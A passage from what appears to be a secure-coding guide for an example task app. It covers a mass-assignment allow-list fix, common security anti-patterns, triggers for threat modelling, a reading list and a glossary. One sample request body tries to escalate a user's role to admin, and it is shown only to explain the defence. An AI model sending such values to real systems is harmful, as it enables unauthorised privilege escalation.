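    for key, value in body.items():
        if key in UPDATABLE_FIELDS:  # silently drop everything else, incl. "role"
            setattr(task, key, value)
    return task
```

A request body of `{"title": "new", "role": "admin"}` updates the title and drops the role escalation on the floor.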


9. Anti-Patterns and Common Traps

"We'll harden it later." Security debt compounds. Later usually means after the breach. Fix: run the threat model now. An hour today saves a year of pain.

Storing passwords with MD5 / SHA-1 / SHA-256. Generic hashes are wrong for passwords. Fix: argon2id with sensible parameters.

Hardcoded secrets in source control. Anything in git history is forever. Fix: secrets manager + pre-commit scanner + immediate rotation when found. Real situation: Uber 2016.

Custom crypto. "We rolled our own AES wrapper" introduces a bug nobody can find. Fix: a well-audited library — libsodium, the language's modern stdlib.

Trusting client-side validation for authorisation. The client is the attacker's territory. Fix: re-check on the server, every time. Disabling a button does nothing.

Mandatory password rotation every 90 days. Empirically increases password reuse and theatre passwords. NIST SP 800-63 recommends against it. Fix: rotate on suspicion of compromise; require length and a breach-list check at change time.

Security questions ("mother's maiden name"). Public information. Fix: use only as a break-glass fallback; never as a primary factor.

SMS-based MFA as the only MFA option. SIM swap is a real attack. Fix: offer TOTP and passkeys. Allow SMS only as accessibility fallback.

Mass assignment in API frameworks. Accepting {"role": "admin"} because the framework auto-binds. Fix: explicit allow-list of fields (DTO / serializer with explicit fields).

Trusting authenticated identity for authorisation. "They are logged in, so they can do this." No — who they are decides what they can do. Fix: separate authn and authz; check ownership at the row level.

Logging full request bodies, query strings, or stack traces in production. Captures secrets, tokens, PII. Fix: structured logging with redaction at the source.

Verbose error messages. "Username does not exist" leaks an account-enumeration oracle. Fix: generic "invalid credentials" for both wrong-username and wrong-password.

Disabling security headers because "CSP breaks our site." That is the wrong fix. Fix: tighten CSP gradually — start report-only, fix violations, then enforce.

One CI key with admin access to everything. Lost CI key = lost everything. Fix: scoped, short-lived credentials per pipeline.

Failing open instead of closed. When a check errors, the wrong default is "let it through." Fix: every error path on a sensitive action ends in deny — fail closed.

No incident plan. When something happens, you panic. Fix: a written runbook, a contact tree, an annual tabletop exercise. The first hour of an incident is when good plans pay for themselves.

"Theatre is expensive and useless. Real defence is cheap and quiet. Pick the second."


10. When to Tackle Security — Triggers

Security work is not a quarterly sprint. It is a set of triggers in your normal flow. When any of these fire, do the threat-model pass before you ship.

  • Adding a new third-party dependency. Read the package's recent activity, owners, history. Pin the version. Add it to dependency scanning. TaskTrail example: a new analytics SDK could phone home with the user's session id.
  • Adding a new entry point. A new public endpoint, a new webhook, a new email-driven action, a new file upload, a new mobile deep link. Each is fresh attack surface.
  • Touching auth, session, or token code. Any change here multiplies risk. Slow down. Add an extra reviewer.
  • Storing a new piece of data. Ask what the classification is — public, private, sensitive, or secret — before writing the row. TaskTrail example: if you start storing IP addresses, GDPR may now apply.
  • Sending data to a new endpoint. Ask: is this in scope of our threat model? What is the minimum we need to send?
  • Onboarding a new market or customer segment. Different threat models. SIM swap is huge in some regions; GDPR kicks in for EU users; HIPAA if you receive any health data; PCI if you touch card numbers.
  • Hiring a contractor or granting a new access role. Every new principal is a new key-holder. Provision least-privilege; deprovision the day they leave.
  • A bug bounty / pen-test report lands. Every report — even "low" — is free threat-model data. Real situation: many large breaches are foreshadowed by a bounty report someone closed too fast.
  • Before any major launch. A short pre-launch security review with a checklist beats finding the bug post-launch.
  • After any incident. The postmortem must produce at least one structural change, not just "we'll be more careful next time."

"If the change touches an asset from your threat model, you tackle security now."


11. What to Read Next

A short list. One sentence per item on what you will gain.

  1. OWASP Top 10 — the canonical taxonomy of common application vulnerabilities; updated every few years. Read the current edition.
  2. OWASP Application Security Verification Standard (ASVS) — a leveled checklist (L1, L2, L3) that tells you what "secure" means for your application class.
  3. Threat Modeling: Designing for Security by Adam Shostack — the textbook on the discipline.
  4. The Tangled Web by Michał Zalewski — old, still the clearest book on browser/web threat models.
  5. Cryptography Engineering by Ferguson, Schneier, Kohno — the right level for engineers; teaches how to use crypto, not how to invent it.
  6. Google's BeyondCorp papers — the original argument for zero trust, written from the inside.
  7. NIST SP 800-63 Digital Identity Guidelines — the modern source of truth on passwords, MFA, and identity. Quietly contradicts a lot of old conventional wisdom (rotation, complexity rules).
  8. Incident postmortems from Cloudflare, GitLab, Stripe, Fly.io — reading real incidents teaches more than any book. They are short, honest, and free.

12. Glossary

  • AEAD (Authenticated Encryption with Associated Data) — encryption plus tamper detection in one step.
  • Argon2 — winner of the Password Hashing Competition; recommended for new systems.
  • Asset — anything of value the attacker is after.
  • Asymmetric encryption — one key encrypts, a different key decrypts (public + private).
  • Attack surface — every place untrusted input meets the system.
  • Attacker / threat actor — any person or system trying to take an asset.
  • Audit log — append-only record of who did what, when, with what result.
  • Authentication (authn) — proving who you are.
  • Authorisation (authz) — proving what you may do.
  • Availability — the system answers when needed.
  • AWS Secrets Manager — backend secrets store on AWS.
  • Bcrypt — battle-tested password-hashing default.
  • Breach — incident with confirmed data loss.
  • Bug bounty — paid programme that rewards external researchers for reports.
  • Certificate — cryptographic identity document tied to a domain or principal.
  • Certificate Authority (CA) — entity that issues and signs certificates.
  • CIA triad — Confidentiality, Integrity, Availability.
  • Cloudflare — edge network; well-handled incidents and transparent postmortems.
  • CodeQL — GitHub's deep static-analysis engine.
  • Compliance — meeting controls auditors care about (GDPR, SOC 2, PCI DSS, HIPAA).
  • Confidentiality — only the right people see the data.
  • Cookie — browser-stored value sent automatically with every request to the domain that set it.
  • CSP (Content Security Policy) — HTTP header that restricts which scripts and other resources a page may load.
  • CSRF (Cross-Site Request Forgery) — the user's browser is tricked into sending an authenticated request.
  • CVE (Common Vulnerabilities and Exposures) — a public catalogue of known security flaws, each with a unique id.
  • CVSS (Common Vulnerability Scoring System) — a scoring scheme from 0–10 for CVE severity.
  • Datadog — SaaS observability platform.
  • Defence in depth — layering multiple controls so any one failure does not breach the asset.
  • Dependabot — GitHub-native dependency scanner.
  • Digital signature — value computed with a private key that anyone with the public key can verify.
  • Doppler / Infisical — developer-friendly SaaS secrets managers.
  • E2EE (End-to-End Encryption) — only sender and recipient can read content.
  • Encoding — reversible representation (Base64, URL-encoding); not security.
  • Encryption — reversible transformation requiring a key.
  • Equifax 2017 — unpatched Apache Struts → 147M records.
  • Exploit — code or technique that leverages a vulnerability.
  • Fail closed — when a check errors, deny by default.
  • Fail open — when a check errors, allow by default. (Wrong for sensitive actions.)
  • GCP Secret Manager — backend secrets store on Google Cloud.
  • GDPR — EU regulation on personal-data processing.
  • HackerOne — major bug bounty platform.
  • Hash function — a one-way function that maps any input to a fixed-size output.
  • HashiCorp Vault — open-source secrets-management standard.
  • HIPAA — US regulation on health data.
  • IDOR (Insecure Direct Object Reference) — endpoint returns/modifies an object without ownership check.
  • Identity provider (IdP) — system that authenticates users for many apps.
  • Impact — how bad the outcome is if an attack lands.
  • Incident — a security event with potential or actual harm.
  • Incident response (IR) — process for handling incidents.
  • Initialisation vector (IV) — per-message value used in encryption; never repeat with the same key.
  • Integrity — data has not been changed without authorisation.
  • Injection — attacker input mixed with code/queries on a trust boundary.
  • JSON Web Token (JWT) — signed token containing claims.
  • Key derivation function (KDF) — function that derives a key from a password or other input.
  • Key rotation — replacing a key on a schedule or after compromise.
  • Keycloak — open-source identity provider.
  • Let's Encrypt — free certificate authority.
  • libsodium / NaCl — opinionated, hard-to-misuse cryptography library.
  • Likelihood — how often an attack is tried, in your context.
  • LinkedIn 2012 — unsalted SHA-1 → 117M passwords cracked.
  • MFA (Multi-factor authentication) — requiring more than one factor for login.
  • MOVEit 2023 — SQL injection zero-day → mass data theft.
  • Nonce — number used once; must never repeat under the same key.
  • Non-repudiation — proof that a specific party performed an action and cannot deny it.
  • NVD — NIST's National Vulnerability Database.
  • OAuth 2.0 — authorisation protocol that issues short-lived tokens after login.
  • OIDC (OpenID Connect) — thin identity layer on top of OAuth 2.0.
  • Okta — enterprise identity provider; involved in 2022 third-party breach.
  • OpenSSL — ubiquitous TLS / crypto library; footgun-prone.
  • OSV / OSV-Scanner — Google's package-focused vulnerability database and scanner.
  • OWASP Top 10 — canonical taxonomy of common application vulnerabilities.
  • OWASP ZAP — open-source intercepting proxy / scanner.
  • Passkey / WebAuthn — modern phishing-resistant authentication standard.
  • PCI DSS — payment-card data standard.
  • Pepper — global secret added to every password hash.
  • PII (Personally Identifiable Information) — names, emails, IDs that can be tied to a real person.
  • PKI (Public Key Infrastructure) — system of certificates and authorities tying public keys to identities.
  • Postmortem / retrospective — write-up after an incident describing what happened, why, and what changes.
  • Principle of least privilege — give every component only the permissions it needs.
  • Public key / private key — the asymmetric pair.
  • Race condition / TOCTOU — wrong answer caused by ordering between check and use.
  • Rate limiting — bounding work per unit time.
  • ReDoS (Regex Denial of Service) — pathological regex evaluation that ties up CPU.
  • Renovate — open-source dependency updater.
  • Residual risk — what remains after the chosen defence has been applied.
  • Responsible disclosure — reporting a vulnerability privately before public release.
  • RBAC (Role-Based Access Control) — permissions attached to roles; users get roles.
  • ABAC (Attribute-Based Access Control) — decisions on attributes (user, resource, time, context).
  • Risk — likelihood × impact.
  • Salt — random per-user value mixed into the password before hashing.
  • SBOM (Software Bill of Materials) — manifest of all dependencies and their versions.
  • Scrypt — memory-hard password hashing.
  • Secret — small piece of data that must not leak (password, token, key).
  • Security misconfiguration — default credentials, open buckets, debug endpoints.
  • Security theatre — control that looks like security without measurable risk reduction.
  • Sensitive data exposure — secrets or PII leaked through logs, URLs, or weak transport.
  • Session — server-side state that lets the client skip re-authentication for a while.
  • Sign in with Apple / Google — consumer SSO providers.
  • Signal — end-to-end encryption done right; reference example.
  • SIM swap — attacker convinces the carrier to move a phone number to their SIM.
  • SOC 2 — US-origin attestation report on operational controls.
  • SolarWinds 2020 — supply-chain compromise of Orion software updates.
  • SSO (Single sign-on) — one login across multiple apps.
  • SSRF (Server-Side Request Forgery) — server is tricked into fetching attacker-controlled URL.
  • Symmetric encryption — same key encrypts and decrypts.
  • Threat — possibility of an attack.
  • Threat actor — who would do it (see Attacker).
  • Threat model — short written list of what you protect, who attacks, and how.
  • TLS (Transport Layer Security) — standard protocol that encrypts and authenticates network traffic.
  • TOTP (Time-based one-time password) — 6-digit code from an authenticator app, refreshing every 30 seconds.
  • Token (access / refresh / ID) — string that proves the bearer has permission.
  • Trivy — open-source container and infra scanner.
  • Uber 2016 — hardcoded credentials in GitHub → breach + cover-up.
  • Vault — see HashiCorp Vault.
  • Vulnerability — a flaw that an attacker can exploit.
  • WAF (Web Application Firewall) — filtering layer at the edge that blocks known attack shapes.
  • WebAuthn — see Passkey / WebAuthn.
  • XSS (Cross-Site Scripting) — attacker-controlled content rendered as code in another user's browser.
  • Yahoo 2013 — 3B accounts; weak hashing; widely cited breach.
  • Zero trust — every request is suspect, even from inside the network.